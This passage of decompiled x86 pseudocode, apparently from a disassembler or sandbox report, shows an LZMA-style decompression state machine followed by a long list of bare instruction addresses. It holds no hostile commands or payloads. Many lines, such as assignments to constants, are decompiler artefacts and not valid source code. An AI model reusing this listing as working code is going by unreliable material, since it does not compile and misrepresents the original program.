												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                    0x00000000
                    0x0040711c
                    0x0040711c
                    0x00407120
                    0x0040712d
                    0x00407137
                    0x00000000
                    0x00407122
                    0x00407122
                    0x0040715d
                    0x00407160
                    0x00407163
                    0x00407166
                    0x00407166
                    0x00407169
                    0x00407170
                    0x00407175
                    0x00407056
                    0x00407059
                    0x004073cb
                    0x004073cb
                    0x004073cb
                    0x004073ce
                    0x004073ce
                    0x004073ce
                    0x004073d4
                    0x004073da
                    0x004073e0
                    0x004073fa
                    0x004073fd
                    0x00407403
                    0x0040740e
                    0x00407410
                    0x004073e2
                    0x004073e2
                    0x004073f1
                    0x004073f5
                    0x004073f5
                    0x0040741a
                    0x00000000
                    0x00000000
                    0x0040741c
                    0x00407420
                    0x004075cf
                    0x004075e5
                    0x004075ed
                    0x004075f4
                    0x004075f6
                    0x004075fd
                    0x00407601
                    0x00407601
                    0x0040742c
                    0x00407433
                    0x0040743b
                    0x0040743e
                    0x00407441
                    0x00407441
                    0x00407447
                    0x00407447
                    0x00406be3
                    0x00406be3
                    0x00406be3
                    0x00406bec
                    0x00000000
                    0x00000000
                    0x00406bf2
                    0x00000000
                    0x00406bfd
                    0x00000000
                    0x00000000
                    0x00406c06
                    0x00406c09
                    0x00406c0c
                    0x00406c10
                    0x00000000
                    0x00000000
                    0x00406c16
                    0x00406c19
                    0x00406c1b
                    0x00406c1c
                    0x00406c1f
                    0x00406c21
                    0x00406c22
                    0x00406c24
                    0x00406c27
                    0x00406c2c
                    0x00406c31
                    0x00406c3a
                    0x00406c4d
                    0x00406c50
                    0x00406c5c
                    0x00406c84
                    0x00406c86
                    0x00406c94
                    0x00406c94
                    0x00406c98
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406c88
                    0x00406c88
                    0x00406c8b
                    0x00406c8c
                    0x00406c8c
                    0x00000000
                    0x00406c88
                    0x00406c62
                    0x00406c67
                    0x00406c67
                    0x00406c70
                    0x00406c78
                    0x00406c7b
                    0x00000000
                    0x00406c81
                    0x00406c81
                    0x00000000
                    0x00406c81
                    0x00000000
                    0x00406c9e
                    0x00406c9e
                    0x00406ca2
                    0x0040754e
                    0x00000000
                    0x0040754e
                    0x00406cab
                    0x00406cbb
                    0x00406cbe
                    0x00406cc1
                    0x00406cc1
                    0x00406cc1
                    0x00406cc4
                    0x00406cc8
                    0x00000000
                    0x00000000
                    0x00406cca
                    0x00406cd0
                    0x00406cfa
                    0x00406d00
                    0x00406d07
                    0x00000000
                    0x00406d07
                    0x00406cd6
                    0x00406cd9
                    0x00406cde
                    0x00406cde
                    0x00406ce9
                    0x00406cf1
                    0x00406cf4
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406d39
                    0x00406d3f
                    0x00406d42
                    0x00406d4f
                    0x00406d57
                    0x004073cb
                    0x004073cb
                    0x00000000
                    0x00000000
                    0x00406d0e
                    0x00406d0e
                    0x00406d12
                    0x0040755d
                    0x00000000
                    0x0040755d
                    0x00406d1e
                    0x00406d29
                    0x00406d29
                    0x00406d29
                    0x00406d2c
                    0x00406d2f
                    0x00406d32
                    0x00406d37
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004073ce
                    0x004073ce
                    0x004073d4
                    0x004073da
                    0x004073e0
                    0x004073fa
                    0x004073fd
                    0x00407403
                    0x0040740e
                    0x00407410
                    0x004073e2
                    0x004073e2
                    0x004073f1
                    0x004073f5
                    0x004073f5
                    0x0040741a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406d5f
                    0x00406d61
                    0x00406d64
                    0x00406dd5
                    0x00406dd8
                    0x00406ddb
                    0x00406de2
                    0x00406dec
                    0x004073cb
                    0x004073cb
                    0x004073cb
                    0x00000000
                    0x004073cb
                    0x004073cb
                    0x00406d66
                    0x00406d6a
                    0x00406d6d
                    0x00406d6f
                    0x00406d72
                    0x00406d75
                    0x00406d77
                    0x00406d7a
                    0x00406d7c
                    0x00406d81
                    0x00406d84
                    0x00406d87
                    0x00406d8b
                    0x00406d92
                    0x00406d95
                    0x00406d9c
                    0x00406da0
                    0x00406da8
                    0x00406da8
                    0x00406da8
                    0x00406da2
                    0x00406da2
                    0x00406da2
                    0x00406d97
                    0x00406d97
                    0x00406d97
                    0x00406dac
                    0x00406daf
                    0x00406dcd
                    0x00406dcf
                    0x00000000
                    0x00406db1
                    0x00406db1
                    0x00406db4
                    0x00406db7
                    0x00406dba
                    0x00406dbc
                    0x00406dbc
                    0x00406dbc
                    0x00406dbf
                    0x00406dc2
                    0x00406dc4
                    0x00406dc5
                    0x00406dc8
                    0x00000000
                    0x00406dc8
                    0x00000000
                    0x00406ffe
                    0x00407002
                    0x00407020
                    0x00407023
                    0x0040702a
                    0x0040702d
                    0x00407030
                    0x00407033
                    0x00407036
                    0x00407039
                    0x0040703b
                    0x00407042
                    0x00407043
                    0x00407045
                    0x00407048
                    0x0040704b
                    0x0040704e
                    0x0040704e
                    0x00407053
                    0x00000000
                    0x00407053
                    0x00407004
                    0x00407007
                    0x0040700a
                    0x00407014
                    0x004073cb
                    0x004073cb
                    0x004073cb
                    0x00000000
                    0x004073cb
                    0x00000000
                    0x00407068
                    0x0040706c
                    0x0040708f
                    0x00407092
                    0x00407095
                    0x0040709f
                    0x0040706e
                    0x0040706e
                    0x00407071
                    0x00407074
                    0x00407077
                    0x00407084
                    0x00407087
                    0x00407087
                    0x004073cb
                    0x004073cb
                    0x004073cb
                    0x00000000
                    0x004073cb
                    0x00000000
                    0x004070ab
                    0x004070af
                    0x00000000
                    0x00000000
                    0x004070b5
                    0x004070b9
                    0x00000000
                    0x00000000
                    0x004070bf
                    0x004070c1
                    0x004070c5
                    0x004070c5
                    0x004070c8
                    0x004070cc
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00407143
                    0x00407147
                    0x0040714e
                    0x00407151
                    0x00407154
                    0x00407149
                    0x00407149
                    0x00407149
                    0x00407157
                    0x0040715a
                    0x00000000
                    0x00000000
                    0x00407203
                    0x00407203
                    0x00407207
                    0x004075a5
                    0x00000000
                    0x004075a5
                    0x0040720d
                    0x00407210
                    0x00407213
                    0x00407217
                    0x0040721a
                    0x00407220
                    0x00407222
                    0x00407222
                    0x00407222
                    0x00407225
                    0x00407228
                    0x00000000
                    0x00000000
                    0x00406df8
                    0x00406df8
                    0x00406dfc
                    0x00407569
                    0x00000000
                    0x00407569
                    0x00406e02
                    0x00406e05
                    0x00406e08
                    0x00406e0c
                    0x00406e0f
                    0x00406e15
                    0x00406e17
                    0x00406e17
                    0x00406e17
                    0x00406e1a
                    0x00406e1d
                    0x00406e1d
                    0x00406e20
                    0x00406e23
                    0x00000000
                    0x00000000
                    0x00406e29
                    0x00406e2f
                    0x00000000
                    0x00000000
                    0x00406e35
                    0x00406e35
                    0x00406e39
                    0x00406e3c
                    0x00406e3f
                    0x00406e42
                    0x00406e45
                    0x00406e46
                    0x00406e49
                    0x00406e4b
                    0x00406e51
                    0x00406e54
                    0x00406e57
                    0x00406e5a
                    0x00406e5d
                    0x00406e60
                    0x00406e63
                    0x00406e7f
                    0x00406e82
                    0x00406e85
                    0x00406e88
                    0x00406e8f
                    0x00406e93
                    0x00406e95
                    0x00406e99
                    0x00406e65
                    0x00406e65
                    0x00406e69
                    0x00406e71
                    0x00406e76
                    0x00406e78
                    0x00406e7a
                    0x00406e7a
                    0x00406e9c
                    0x00406ea3
                    0x00406ea6
                    0x00000000
                    0x00406eac
                    0x00000000
                    0x00406eac
                    0x00000000
                    0x00406eb1
                    0x00406eb1
                    0x00406eb5
                    0x00407575
                    0x00000000
                    0x00407575
                    0x00406ebb
                    0x00406ebe
                    0x00406ec1
                    0x00406ec5
                    0x00406ec8
                    0x00406ece
                    0x00406ed0
                    0x00406ed0
                    0x00406ed0
                    0x00406ed3
                    0x00406ed6
                    0x00406ed6
                    0x00406ed6
                    0x00406edc
                    0x00000000
                    0x00000000
                    0x00406ede
                    0x00406ee1
                    0x00406ee4
                    0x00406ee7
                    0x00406eea
                    0x00406eed
                    0x00406ef0
                    0x00406ef3
                    0x00406ef6
                    0x00406ef9
                    0x00406efc
                    0x00406f14
                    0x00406f17
                    0x00406f1a
                    0x00406f1d
                    0x00406f1d
                    0x00406f20
                    0x00406f24
                    0x00406f26
                    0x00406efe
                    0x00406efe
                    0x00406f06
                    0x00406f0b
                    0x00406f0d
                    0x00406f0f
                    0x00406f0f
                    0x00406f29
                    0x00406f30
                    0x00406f33
                    0x00000000
                    0x00406f35
                    0x00000000
                    0x00406f35
                    0x00406f33
                    0x00406f3a
                    0x00406f3a
                    0x00406f3a
                    0x00406f3a
                    0x00000000
                    0x00000000
                    0x00406f75
                    0x00406f75
                    0x00406f79
                    0x00407581
                    0x00000000
                    0x00407581
                    0x00406f7f
                    0x00406f82
                    0x00406f85
                    0x00406f89
                    0x00406f8c
                    0x00406f92
                    0x00406f94
                    0x00406f94
                    0x00406f94
                    0x00406f97
                    0x00406f9a
                    0x00406f9a
                    0x00406fa0
                    0x00406f3e
                    0x00406f3e
                    0x00406f41
                    0x00000000
                    0x00406f41
                    0x00406fa2
                    0x00406fa2
                    0x00406fa5
                    0x00406fa8
                    0x00406fab
                    0x00406fae
                    0x00406fb1
                    0x00406fb4
                    0x00406fb7
                    0x00406fba
                    0x00406fbd
                    0x00406fc0
                    0x00406fd8
                    0x00406fdb
                    0x00406fde
                    0x00406fe1
                    0x00406fe1
                    0x00406fe4
                    0x00406fe8
                    0x00406fea
                    0x00406fc2
                    0x00406fc2
                    0x00406fca
                    0x00406fcf
                    0x00406fd1
                    0x00406fd3
                    0x00406fd3
                    0x00406fed
                    0x00406ff4
                    0x00406ff7
                    0x00000000
                    0x00406ff9
                    0x00000000
                    0x00406ff9
                    0x00000000
                    0x00407286
                    0x00407286
                    0x0040728a
                    0x004075b1
                    0x00000000
                    0x004075b1
                    0x00407290
                    0x00407293
                    0x00407296
                    0x0040729a
                    0x0040729d
                    0x004072a3
                    0x004072a5
                    0x004072a5
                    0x004072a5
                    0x004072a8
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00407395
                    0x00407399
                    0x004073bb
                    0x004073be
                    0x004073c8
                    0x004073cb
                    0x004073cb
                    0x004073cb
                    0x00000000
                    0x004073cb
                    0x004073cb
                    0x0040739b
                    0x0040739e
                    0x004073a2
                    0x004073a5
                    0x004073a5
                    0x004073a8
                    0x00000000
